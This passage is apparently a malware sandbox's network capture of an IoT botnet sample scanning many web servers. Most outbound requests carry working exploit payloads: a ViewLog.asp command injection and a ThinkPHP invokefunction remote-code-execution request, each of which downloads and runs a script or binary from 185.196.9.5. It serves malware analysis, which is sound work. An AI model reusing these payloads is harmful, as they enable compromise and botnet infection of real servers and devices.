Feb 25, 2024 19:04:44.261435986 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:48.869225025 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:57.829035044 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:17.285057068 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
907	192.168.2.15	55296	95.100.138.88	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.420902967 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.640594006 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:40 GMT Date: Sun, 25 Feb 2024 18:04:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 64 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 30 26 23 34 36 3b 63 34 30 32 62 66 39 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.dd86ba5d.1708884280.c402bf90</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
908	192.168.2.15	57854	31.200.120.226	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.425976992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
909	192.168.2.15	56696	94.121.216.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.426033020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
910	192.168.2.15	43426	95.101.178.171	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.454123974 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.700417995 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:40 GMT Date: Sun, 25 Feb 2024 18:04:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 30 26 23 34 36 3b 37 39 66 30 38 39 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b87a7b5c.1708884280.79f089ea</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
911	192.168.2.15	57420	95.154.242.96	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.804318905 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.976747036 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:26 GMT Server: Apache/2.4.53 (cPanel) OpenSSL/1.1.1n mod_bwlimited/1.4 mod_fcgid/2.3.9 Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code {
Feb 25, 2024 19:04:40.976814985 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 Data Ascii: font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
Feb 25, 2024 19:04:40.976855993 CET	1286	IN	Data Raw: 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e Data Ascii: age { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { te
Feb 25, 2024 19:04:40.976896048 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 Data Ascii: .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position:
Feb 25, 2024 19:04:40.976938009 CET	1286	IN	Data Raw: 43 41 34 53 54 46 2b 77 67 38 72 48 37 45 7a 4d 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 Data Ascii: CA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRV
Feb 25, 2024 19:04:40.976975918 CET	1286	IN	Data Raw: 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 Data Ascii: +LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC7
Feb 25, 2024 19:04:40.977025986 CET	1161	IN	Data Raw: 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 Data Ascii: xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphU
Feb 25, 2024 19:04:40.977140903 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to server1.purpletravel.co.uk's <a href="mailto:serve
Feb 25, 2024 19:04:40.977181911 CET	355	IN	Data Raw: 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 Data Ascii: ogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 20

Session ID	Source IP	Source Port	Destination IP	Destination Port
912	192.168.2.15	42606	95.179.148.231	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.815042973 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:40.993462086 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:40 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
913	192.168.2.15	35452	95.111.240.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.824243069 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.011667967 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:40 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
914	192.168.2.15	41580	95.67.77.187	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.843981981 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
915	192.168.2.15	41508	95.42.24.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.844341993 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.052799940 CET	275	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
916	192.168.2.15	37694	95.101.42.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.847156048 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.057307959 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:40 GMT Date: Sun, 25 Feb 2024 18:04:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 30 26 23 34 36 3b 39 61 63 38 64 38 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.97c91002.1708884280.9ac8d882</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
917	192.168.2.15	60712	95.181.177.128	80

Timestamp	Bytes transferred	Direction	Data
